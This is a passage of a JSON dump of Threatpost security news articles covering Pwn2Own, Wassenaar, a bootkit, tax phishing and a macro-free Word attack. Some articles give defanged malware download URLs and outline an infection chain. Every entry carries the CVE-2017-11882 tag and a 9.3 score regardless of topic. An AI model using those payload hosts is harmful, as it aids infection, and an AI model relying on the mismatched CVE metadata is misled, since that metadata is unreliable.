more incentive to bring their vulns to Pwn2Own,\u201d said Aaron Portnoy, the manager of the security research team at TippingPoint. \u201cWe didn\u2019t think it was fair with the drawing. That opens the door for people having a vulnerability they don\u2019t use at the contest and it doesn\u2019t get fixed.\u201d\n\nIn addition to the main cash prizes, contestants also win the laptops that they\u2019re able to successfully compromise targets on. And this year, Google is putting up a prize of $20,000 for every unique set of bugs that can compromise its Chrome browser, without any platform-specific bugs. In order to claim the prize, a participant will have to get full code execution outside of Chrome\u2019s sandbox, but there is no limit to the number of those rewards a researcher can win. So if one participant has three or four of those in his pocket\u2013which seems unlikely\u2013he could earn a serious payday.\n\nGoogle also will pay $10,000 for Chrome vulnerabilities that get code execution outside of the sandbox but also require some OS-specific vulnerability to work, Portnoy said.\n\nThe idea behind all of the changes in this years Pwn2Own is to bring the contest closer to the way it was when it began several years ago. The contest also has dropped mobile devices such as iPhones and Android phones as targets.\n\n\u201cWe\u2019re going back to the roots of Pwn2Own,\u201d Portnoy said. \u201cThe mobile platforms have been a barrier to entry. We expect to see more competitors.\u201d\n\nAll of the new vulnerabilities used in the [Pwn2Own contest](<http://pwn2own.zerodayinitiative.com/>) each year are immediately disclosed to the affected vendors as part of the rules of engagement. The inclusion of the known vulnerabilities in target platforms is a way to test the exploit-writing skills of the researchers, as well as drawing attention to the need for people to patch older bugs.\n\n\u201cWe want to show the importance of patching and want to show that the contest will have active participation over three days,\u201d Portnoy said. \u201cWe want people to watch.\u201d\n\nPortnoy said the list of targets for this year\u2019s contest would be available soon. [CanSecWest](<http://cansecwest.com/index.html>) is March 7-9 this year in Vancouver.\n", "cvss3": {}, "published": "2012-01-23T20:00:06", "type": "threatpost", "title": "Revamped Pwn2Own to Offer $105K in Prizes, Cash From Google for Chrome 0-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:57", "id": "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "href": "https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/76128/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "Microsoft announced Wednesday it will tweak the release of its forthcoming Windows 8 operating system to comply with the European Commission, which argues that in its current state, the software fails to offer customers a browser choice screen to let them \u201ceasily choose their preferred web browser.\u201d\n\nThe browser choice issue was also present in Windows 7 and according to the European Union antitrust commissioner Joaquin Almunia this morning, the EU has been in contact with Microsoft to ensure it doesn\u2019t repeat the same mistake.\n\nAccording to reports, Microsoft was advised to remedy the issue \u201cif they don\u2019t want to take the risk of a new investigation,\u201d Almunia [warned at press conference earlier today](<http://www.google.com/hostednews/afp/article/ALeqM5iXITc3iybCliakA7TZ496XmzPS5g?docId=CNG.8bb0ab94569c4cff3a09e64804358eaa.441>).\n\nThe EU initially took issue that Microsoft\u2019s Windows 7 Service Pack 1, released in February 2011, failed to offer users a choice, something the company has been legally bound to do in Europe since December 2009. After that ruling, the EU mandated that Microsoft display a choice screen to \u201caddress competition concerns.\u201d While the choice screen popped up in March 2010 as part of a five year agreement, from February 2011 to July 2012, the \u201cchoice screen\u201d disappeared from Windows.\n\n\u201cIf infringements are confirmed, Microsoft should expect sanctions,\u201d [Almunia warned in July](<http://europa.eu/rapid/press-release_IP-12-800_en.htm?locale=en>), when proceedings against Microsoft over the most recent issue were opened.\n\nMicrosoft claimed the lack of a \u201cchoice screen\u201d was a due to a technical error and claims it has taken steps to ensure the problem doesn\u2019t happen again. It will implement changes to Windows 8 before its release later this week, [the company acknowledged in a press release today](<http://www.microsoft.com/en-us/news/Press/2012/Oct12/10-24statement.aspx>).\n\nIn the U.S., Windows 8 is slated for release on Friday, while a tweaked version, Windows 8 Pro N will be released in Europe without Windows Media Player. Similar to the browser choice ruling, the EU ruled in 2004\u2019s \u201cMicrosoft competition case,\u201d that tying the player to Windows was an \u201cabuse of a dominant position.\u201d In response, the Microsoft had to release a version of its Windows software [with its flagship media player stripped out](<http://www.law.yale.edu/documents/pdf/The_Economists_Voice.pdf>). (.PDF)\n\nThe EU is known for taking a tougher stance toward user privacy than the U.S., along with enforcing its competition law \u2014 a law that is effectively the equivalent of the U.S.\u2019s antitrust law. The commission fined Microsoft twice, [in 2004 and 2008](<http://news.bbc.co.uk/2/hi/business/7266629.stm>) after it determined it had gained unfair market advantage with its Windows platform. \n", "cvss3": {}, "published": "2012-10-24T19:01:05", "type": "threatpost", "title": "Microsoft Agrees to Modify Windows 8 Following EU Complaint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "href": "https://threatpost.com/microsoft-agrees-modify-windows-8-following-eu-complaint-102412/77151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic &amp; International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily, Goodwin claimed.\n\n\u201cTo be able to understand [malware] \u2014 what it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. For many companies, to carry out certain research activities, they\u2019d be forced to request export licenses, something that many security officials believe would work against the idea of information sharing.\n\nThe issue has been a largely one-sided one. Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. \u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe &amp; Johnson LLP, said during the panel. Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "description": "Problems with [a security update issued this week by Microsoft](<https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565>) have surfaced on a number of technology forums.\n\nWindows users say [Microsoft Security Advisory 303929](<https://technet.microsoft.com/en-us/library/security/3033929.aspx>), which adds SHA-2 code-signing and verification support for Windows 7 client machines and Windows Server 2008 R2 boxes, is causing computers to enter into an infinite loop.\n\nA request for comment from Microsoft was not returned in time for publication. It is not clear whether or when Microsoft will pull the update back for repairs as it has with other [faulty](<https://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>) [patches](<https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>).\n\n\u201cAfter installation the PC reboots, but during the boot up configuration of the patch it fails and Windows starts, reverting the configuration and reboots,\u201d said one poster on a Microsoft-sponsored [Windows forum](<http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/kb3033929-fails-to-install-and-cause-a-minor/4c56d5d5-a66c-4865-8ccb-d36f7c314c33>). \u201cAnd then it starts all over again a couple of times until it eventually boot into Windows.\u201d\n\nNine others on that one forum posted a reply noting the same problem almost verbatim.\n\nTuesday\u2019s update notes that it supersedes another similar update from October and addressed issues that customers had with that installation, Microsoft said. Windows 8, 8.1, RT, RT 8.1, Windows Server 2012 and Windows Server 2012 R2 already have SHA-2 support built in. Windows Server 2003, Vista and Windows Server 2008 will not receive similar support, Microsoft said.\n\nThe SHA-1 algorithm has long been considered weak, obsolete and dangerous to deploy with [collision attacks against it considered practical by 2018](<threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Microsoft, itself, formally recommended that [developers stop using SHA-1](<https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) two years ago, and deprecate other weak crypto such as RC4. By January, Microsoft developers will no longer be allowed to use SHA-1 in code signing or developer certs.\n\nBrowser makers such as Mozilla and Google have also shunned the use of SHA-1. Mozilla, last September, [formally asked Certificate Authorities and websites to upgrade certificates to SHA-256, SHA-384 or SHA-512](<https://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>), all exponentially stronger mathematically than SHA-1, and announced that SHA-1 should not be trusted after Jan. 1, 2017.\n\nGoogle, meanwhile, [phased out SHA-1 usage in its Chrome](<https://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>) browser starting last November with Chrome 40. Since then, Chrome no longer fully trusts sites whose certificate chains trust SHA-1 and extend beyond Jan. 1, 2017. Sites with SHA-1 certificates extending beyond that date will be trusted, but Chrome will note that they have \u201cminor errors.\u201d Staring with Chrome 40, sites with certificate chains including SHA-1 which extend beyond Jan. 1, 2017 will be marked with a blank white sheet, the current visual display for \u201cneutral, lacking security.\u201d Chrome 41 will treat such sites as \u201caffirmatively insecure,\u201d a state indicated by a padlock with a red X on top of it and a red strike through the text that says HTTPS.\n", "cvss3": {}, "published": "2015-03-12T10:16:57", "type": "threatpost", "title": "Microsoft SHA-2 Advisory Causing 'Infinite Loop' Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-12T14:16:57", "id": "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "href": "https://threatpost.com/microsoft-sha-2-advisory-causing-infinite-loop-issues/111597/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:21", "description": "A security researcher who has in the past has created low-level rootkits capable of staying resident on an infected machine after reboots, said he has now accomplished the same feat on Windows 8, which hasn\u2019t even hit the shelves yet. Peter Kleissner said he has created a new version of his Stoned bootkit that defeats the pre-boot security checks included in the forthcoming OS and survives reboots.\n\nKleissner is known in the security community for his creation of the [Stoned bootkit](<http://www.stoned-vienna.com/>), a sophisticated form of rootkit that is designed to load from the master boot record and stay resident in memory throughout the boot process. The previous version of the bootkit was designed to work on Windows XP through Windows 7, but the new one that Kleissner has written also works on Windows 8. He said in a message on Twitter Thursday that Stoned Lite is a small footprint bootkit that can be loaded from either a USB stick or a CD.\n\nHe said he may also add some other functionality to the software in the near future.\n\n\u201cMight add in-memory patching of msv1_0!MsvpPasswordValidate, so it allows to log on with any password.. nothing new but nice and fancy,\u201d Kleissner said in a later Twitter message.\n\nThe pre-boot security mechanisms in Windows 8 have drawn a lot of scrutiny in recent months, particularly the fact that [Microsoft is implementing a version of UEFI](<https://threatpost.com/secure-boot-windows-8-worries-researchers-092211/>) instead of the traditional BIOS. UEFI includes some functionality that allows Microsoft to require that any software loaded during the boot sequence of a Windows PC be signed by one of the keys loaded into the firmware. Open-source advocates have argued that the technology could allow the company to prevent users from loading alternate operating systems, but Microsoft and [officials from the Linux Foundation](<https://threatpost.com/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111/>) have said that isn\u2019t necessarily the case.\n\nKleissner said that he notified Microsoft of his work and has given the company the source code of the bootkit and the paper he\u2019s written for a conference presentation.\n\nMicrosoft has not confirmed the details of Kleissner\u2019s claims.\n", "cvss3": {}, "published": "2011-11-17T20:42:19", "type": "threatpost", "title": "New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:19", "id": "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "href": "https://threatpost.com/new-version-stoned-bootkit-said-bypass-windows-8-secure-boot-111711/75909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. The payload is designed to steal credentials from the victim\u2019s email, FTP and browsers.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the malware infection string uses a combination of techniques that start with a .DOCX formatted attachment. The spam originates from for the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d describes researchers.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (or .DOCX formatted) documents created using Microsoft Office 2007 use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\\(v=office.12\\).aspx>)\u201c. The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, said researchers.\n\nStage two includes the .DOCX file triggering the download of an RTF (rich text file format) file.\n\n\u201cWhen user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually a RTF file that is downloaded and executed,\u201d researchers describe.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882). In November, Microsoft patched the vulnerability. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nStage three includes the decoding of text inside the RTF file that in turn triggers a MSHTA command line that downloads and executes an HTML executable HTA file. Next the HTA contains an obfuscated PowerShell Script which eventually downloads and executes the remote payload \u2013 the Password Stealer Malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. \u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:47", "description": "Do you find e-mail pleas for help from the widow of Democratic Republic of the Congo strongman Mobutu Sese Seko unconvincing or downright silly? That may be the point, according to Microsoft researcher Cormac Herley.\n\nThe outlandish claims of Nigerian Letter \u2013 or \u201c419\u201d \u2013 scams serve a critical purpose: separating the skeptics from the suckers. That\u2019s the conclusion of a new [paper published by Microsoft Research](<http://research.microsoft.com/apps/pubs/default.aspx?id=167712>) and scheduled to be presented on June 25th at the Workshop on the Economics of Information Security (WEIS) 2012 Conference in Berlin, Germany.\n\n\n\nThe paper, \u201c[Why do Nigerian Scammers Say They are from Nigeria?](<http://research.microsoft.com/pubs/167712/WhyFromNigeria.pdf>)\u201d (PDF) by researcher Cormac Herley analyzes the methods that online scammers use to navigate around a common problem in any detection program: false positives.\n\nIn the context of online scams, a \u201cfalse positive\u201d is any individual who is attacked, but yields nothing to the attacker.\n\nAs the density of potential victims decreases, Herley observes, the share of them that can be profitably attacked plummets. That leaves scammers in a Catch-22: only by targeting large numbers of potential victims can scammers find enough viable targets to make a profit. But the incremental cost of running 419 scams makes it unprofitable to target a large number of potential victims. That is, unless the attackers have an easy (and cheap) way to distinguish between the suckers and the non-suckers.\n\nAnd that\u2019s where \u201cNigeria\u201d comes in. Basing the attack on an absolutely absurd and unbelievable premise (i.e. far-fetched stories of West African riches) is, according to Herley, an advantage to the attacker.\n\n\n\n\u201cBy sending an email that repels all but the most gullible the scammer gets the most promising marks to self-select, and tilts the true to false positive ratio in his favor.\u201d\n\nHerley is the principle researcher at Microsoft\u2019s machine learning department. The work on Nigerian scams isn\u2019t his first try at parsing the economics of fraud. His past research has debunked industry claims about [the size of the underground economy](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) and the [utility of cybercrime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>), among other topics. You can read more on the WEIS 2012 conference Web site [here](<http://weis2012.econinfosec.org/program.html>). \n", "cvss3": {}, "published": "2012-06-21T12:40:09", "type": "threatpost", "title": "It's The Stupidity, Stupid: How Absurd Pitches Help Online Scammers Find Their Marks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:29", "id": "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "href": "https://threatpost.com/its-stupidity-stupid-microsoft-says-absurd-pitches-help-online-scammers-find-their-marks-06211/76718/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday this year\u2019s crop of tax scams are using social engineering attacks based on fear to spread Zdowbot and Omaneat banking Trojans and collect personal info via spoofed tax sites linked to from phishing campaigns.\n\nThe warning comes with less than a month before the April 18 tax deadline and add to an already busy tax season of scams reported by various security experts and the U.S. Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d and \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. Microsoft says scammers are also targeting certified public accountants with email subject lines \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warn recipients they face pending tax-related law enforcement action. A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in a Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Email with the subject line \u201cI need a CPA\u201d contain the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1.png>)\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains a malicious macro code. If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. \u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. Emails don\u2019t include attachments, rather they include warnings from the sender that purports to be from the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png>)\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. Even if the emails came from someone you know, be wary about opening the attachment or click on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:42", "description": "Microsoft has released an open-source Web Protection Library (WPL) to help developers protect web sites from cross-site scripting attacks.\n\nThe WPL, which is a set of .NET assemblies, is being offered as part of a defense in depth strategy to add an extra layer to any validation or secure coding practices.\n\nIt essentially provides a list of encoding functions for user input, including HTML, HTML attributes, XML, CSS and JavaScript.\n\n * **White Lists:** AntiXSS differs from the standard .NET framework encoding by using a white list approach. All characters not on the white list will be encoded using the correct rules for the encoding type. Whilst this comes at a performance cost AntiXSS has been written with performance in mind.\n * **Secure Globalization:** The web is a global market place, and cross-site scripting is a global issue. An attack can be coded anywhere, and Anti-XSS now protects against XSS attacks coded in dozens of languages.\n * **Security Runtime Engine**: The Security Runtime Engine (SRE) provides a wrapper around your existing web sites, ensuring that common attack vectors to not make it to your application. Protection is provided as standard forCross Site ScriptingSQL Injection.\n\nDocumentation and download instructions [can be found at the open-source Codeplex](<http://wpl.codeplex.com/releases/view/20333>) site.\n", "cvss3": {}, "published": "2010-06-02T16:37:20", "type": "threatpost", "title": "Microsoft Releases Anti-XSS Web Protection Library", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:52", "id": "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "href": "https://threatpost.com/microsoft-releases-anti-xss-web-protection-library-060210/74047/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "[](<https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/>)There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE and there is a working exploit for the flaw circulating online. The flaw lies in the way that Internet Explorer handles CSS data. [CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in the mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. The SANS Internet Storm Center also has an analysis up.\n\nA vulnerability has been identified in Microsoft Internet Explorer, \nwhich could be exploited by attackers to compromise a vulnerable \nsystem. This issue is caused by a dangling pointer in the Microsoft \nHTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via \nthe \u201cgetElementsByTagName()\u201d method, which could allow attackers to \ncrash an affected browser or execute arbitrary code by tricking a user \ninto visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely lead to the release of a more reliable exploit soon. In lieu of a patch, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:59", "description": "**[](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>)**\n\nDennis Fisher talks with Microsoft\u2019s Katie Moussouris about the way that the Trustworthy Computing effort at Microsoft has changed, how the security community has evolved since she got involved in the 1990s and the challenges\u2013and fun\u2013of being a woman in security.\n\n*Podcast audio courtesy of 